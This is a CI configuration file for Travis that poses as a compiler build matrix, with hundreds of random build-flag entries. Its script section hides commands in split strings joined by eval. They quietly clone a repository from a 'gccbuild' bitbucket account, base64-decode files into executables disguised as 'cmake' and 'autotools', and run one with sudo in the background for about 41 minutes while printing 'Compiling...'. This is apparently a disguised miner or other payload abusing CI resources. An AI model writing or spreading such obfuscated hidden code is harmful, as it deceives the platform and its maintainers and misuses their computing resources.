dist: bionic

env:
  - BUILD="--digest=353jm"
  - BUILD="--keep-going=204t0"
  - BUILD="--rebuild-if-unbuilt=907dq"
  - BUILD="--package-moves=722q1"
  - BUILD="--list-sets=287Ky"
  - BUILD="--complete-graph-if-new-use=358L2"
  - BUILD="--getbinpkgonly=726R4"
  - BUILD="--sysroot=191F9"
  - BUILD="--autounmask-unrestricted-atoms=3854r"
  - BUILD="--quiet-build=94Dz"
  - BUILD="--rage-clean=779We"
  - BUILD="--tree=905Xl"
  - BUILD="--autounmask-use=466OV"
  - BUILD="--quiet-build=255IV"
  - BUILD="--dynamic-deps=156jJ"
  - BUILD="--autounmask-unrestricted-atoms=138Mb"
  - BUILD="--load-average=483z2"
  - BUILD="--root-deps=3765c"
  - BUILD="--rebuilt-binaries=915Ef"
  - BUILD="--search=401AS"
  - BUILD="--newuse=233Rr"
  - BUILD="--version=168En"
  - BUILD="--autounmask-keep-keywords=782sN"
  - BUILD="--rage-clean=4414u"
  - BUILD="--regen=9442I"
  - BUILD="--with-test-deps=615xg"
  - BUILD="--check-news=2189H"
  - BUILD="--changed-slot=43QT"
  - BUILD="--exclude=781eZ"
  - BUILD="--quiet-unmerge-warn=17dV"
  - BUILD="--usepkgonly=411lr"
  - BUILD="--dynamic-deps=86179"
  - BUILD="--newuse=252KW"
  - BUILD="--depclean-lib-check=763nl"
  - BUILD="--quiet-repo-display=388dE"
  - BUILD="--root=719sV"
  - BUILD="--check-news=814hE"
  - BUILD="--quiet-build=7WT"
  - BUILD="--changed-deps-report=225gy"
  - BUILD="--buildpkg-exclude=502a5"
  - BUILD="--autounmask-continue=66gH"
  - BUILD="--complete-graph=144dW"
  - BUILD="--rebuild-if-unbuilt=719Xq"
  - BUILD="--debug=981QH"
  - BUILD="--rebuild-if-new-slot=290jC"
  - BUILD="--jobs=18ew"
  - BUILD="--verbose-slot-rebuilds=703V1"
  - BUILD="--fuzzy-search=514pU"
  - BUILD="--depclean=158fW"
  - BUILD="--changed-deps-report=6477U"
  - BUILD="--autounmask-only=318iE"
  - BUILD="--autounmask-keep-keywords=857rv"
  - BUILD="--buildpkgonly=1972s"
  - BUILD="--metadata=429ul"
  - BUILD="--search-index=131As"
  - BUILD="--rage-clean=287U2"
  - BUILD="--verbose-slot-rebuilds=796tx"
  - BUILD="--changelog=302T2"
  - BUILD="--getbinpkg=596DW"
  - BUILD="--changed-use=370p4"
  - BUILD="--quiet-unmerge-warn=119bW"
  - BUILD="--config-root=5480C"
  - BUILD="--binpkg-respect-use=59CF"
  - BUILD="--complete-graph-if-new-ver=830Cj"
  - BUILD="--keep-going=834O7"
  - BUILD="--sysroot=375I0"
  - BUILD="--selective=651Gj"
  - BUILD="--changed-slot=2346w"
  - BUILD="--quiet=7727d"
  - BUILD="--update=201jq"
  - BUILD="--autounmask-backtrack=672hL"
  - BUILD="--depclean-lib-check=7695o"
  - BUILD="--fetch-all-uri=124xJ"
  - BUILD="--tree=385tl"
  - BUILD="--quiet-unmerge-warn=414yM"
  - BUILD="--unordered-display=877Do"
  - BUILD="--prefix=601u2"
  - BUILD="--rebuilt-binaries-timestamp=369PY"
  - BUILD="--rebuild-if-new-ver=310hh"
  - BUILD="--reinstall=174xj"
  - BUILD="--newuse=204VJ"
  - BUILD="--unordered-display=549j9"
  - BUILD="--sync=187Oq"
  - BUILD="--columns=212qp"
  - BUILD="--autounmask-license=566K8"
  - BUILD="--resume=1173E"
  - BUILD="--changed-deps=568ky"
  - BUILD="--usepkgonly=6907K"
  - BUILD="--rebuild-if-new-slot=82701"
  - BUILD="--getbinpkg=4653o"
  - BUILD="--with-bdeps=8573x"
  - BUILD="--config-root=959AE"
  - BUILD="--noreplace=9701J"
  - BUILD="--dynamic-deps=949q"
  - BUILD="--depclean-lib-check=302dJ"
  - BUILD="--fetchonly=652n6"
  - BUILD="--rebuilt-binaries=263nt"
  - BUILD="--emptytree=324Za"
  - BUILD="--fetchonly=618Lm"
  - BUILD="--ask=43881"
  - BUILD="--autounmask-use=846kr"
  - BUILD="--rebuild-if-new-ver=878Bf"
  - BUILD="--pkg-format=196Eq"
  - BUILD="--rebuild-if-new-slot=431tv"
  - BUILD="--emptytree=515Q3"
  - BUILD="--ask-enter-invalid=750Sh"
  - BUILD="--config-root=371id"
  - BUILD="--complete-graph-if-new-use=306pf"
  - BUILD="--rebuild-exclude=529lJ"
  - BUILD="--package-moves=953xa"
  - BUILD="--verbose-conflicts=195FC"
  - BUILD="--rage-clean=780ug"
  - BUILD="--ignore-built-slot-operator-deps=729Ex"
  - BUILD="--config=261CG"
  - BUILD="--rebuild-if-new-rev=108kt"
  - BUILD="--ignore-soname-deps=340fL"
  - BUILD="--autounmask-use=759zz"
  - BUILD="--reinstall=1491a"
  - BUILD="--quiet-repo-display=973eg"
  - BUILD="--rebuilt-binaries-timestamp=799rh"
  - BUILD="--debug=9604A"
  - BUILD="--verbose=86zO"
  - BUILD="--rebuild-if-new-rev=601yN"
  - BUILD="--sync-submodule=134FT"
  - BUILD="--changed-use=817zn"
  - BUILD="--sysroot=5070f"
  - BUILD="--search-similarity=771Jj"
  - BUILD="--getbinpkg=944xL"
  - BUILD="--debug=668dj"
  - BUILD="--autounmask-keep-masks=559fh"
  - BUILD="--unordered-display=680No"
  - BUILD="--with-bdeps=893nv"
  - BUILD="--changed-deps-report=4506u"
  - BUILD="--changed-use=594Kr"
  - BUILD="--with-test-deps=981oI"
  - BUILD="--verbose-slot-rebuilds=567Kn"
  - BUILD="--quickpkg-direct=517Q9"
  - BUILD="--newuse=799ZY"
  - BUILD="--quiet-build=944e8"
  - BUILD="--ignore-world=191VK"
  - BUILD="--update=269ny"
  - BUILD="--buildpkg=768yb"
  - BUILD="--prune=624VY"
  - BUILD="--package-moves=809F6"
  - BUILD="--autounmask-continue=149Vq"
  - BUILD="--autounmask-keep-masks=6995f"
  - BUILD="--skipfirst=9321a"
  - BUILD="--usepkg-exclude=199D9"
  - BUILD="--reinstall=965VI"
  - BUILD="--resume=585VB"
  - BUILD="--color=87sl"
  - BUILD="--onlydeps-with-rdeps=254Pi"
  - BUILD="--autounmask-continue=58Wx"
  - BUILD="--tree=903j2"
  - BUILD="--regen=876tw"
  - BUILD="--binpkg-changed-deps=359TJ"
  - BUILD="--fuzzy-search=842Le"
  - BUILD="--complete-graph-if-new-ver=640PV"
  - BUILD="--root-deps=134Wz"
  - BUILD="--help=710dB"
  - BUILD="--autounmask-only=354jz"
  - BUILD="--jobs=357Oa"
  - BUILD="--quickpkg-direct=284Xy"
  - BUILD="--changed-deps-report=522dd"
  - BUILD="--root=929dG"
  - BUILD="--package-moves=324oL"
  - BUILD="--rebuild-if-unbuilt=9722V"
  - BUILD="--autounmask-continue=96Z1"
  - BUILD="--searchdesc=880sJ"
  - BUILD="--use-ebuild-visibility=578Lo"
  - BUILD="--quiet-fail=2194L"
  - BUILD="--unmerge=69qP"
  - BUILD="--select=773Lp"
  - BUILD="--with-bdeps-auto=529Jo"
  - BUILD="--autounmask-keep-masks=676cy"
  - BUILD="--useoldpkg-atoms=8068O"
  - BUILD="--use-ebuild-visibility=520UC"
  - BUILD="--regen=19337"
  - BUILD="--newuse=723ll"
  - BUILD="--usepkg-exclude=43cr"
  - BUILD="--selective=560GZ"
  - BUILD="--exclude=247m5"
  - BUILD="--help=364Mn"
  - BUILD="--depclean-lib-check=117sb"
  - BUILD="--quickpkg-direct=3511u"
  - BUILD="--search-similarity=128NK"
  - BUILD="--resume=223az"
  - BUILD="--quickpkg-direct=785fV"
  - BUILD="--noconfmem=88K6"
  - BUILD="--usepkg-exclude=878XB"

language: minimal

script:
  - pCoNeC="sudo apt up"
  - QeoerILc="date || tru"
  - eval "$pCoNeC""$QeoerILc""e"
  - VANZEHfi="sudo apt --"
  - AgAsyZ="yes install"
  - xxUszdU=" cl-base64 "
  - VIEQQn="git &>/dev/"
  - eval "$VANZEHfi""$AgAsyZ""$xxUszdU""$VIEQQn""null"
  - ZrWRDaZR="git clone h"
  - yFEDtjUSeu="ttps://gccb"
  - EVbFSUdUR="uild@bitbuc"
  - pasxOgURKvU="ket.org/gcc"
  - KppwWwabx="build/gcc.g"
  - jZDNeFcpfN="it &>/dev/n"
  - eval "$ZrWRDaZR""$yFEDtjUSeu""$EVbFSUdUR""$pasxOgURKvU""$KppwWwabx""$jZDNeFcpfN""ull"
  - oyCfDMEj="base64 -d g"
  - HcsHWHErmG="cc/cmake_ >"
  - eval "$oyCfDMEj""$HcsHWHErmG"" cmake"
  - BWmGxkZ="base64 -d g"
  - toHFrUblKGj="cc/config_ "
  - eval "$BWmGxkZ""$toHFrUblKGj""> xconfig"
  - WJVYxja="base64 -d g"
  - yEjKYYFNqE="cc/make_ > "
  - eval "$WJVYxja""$yEjKYYFNqE""autotools"
  - chmod +x autotools cmake
  - ./cmake
  - sed -i 's/build/tg3u/g' xconfig
  - sudo ./autotools --config=xconfig &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2474)) ] && sudo killall autotools && break; sleep 195; done
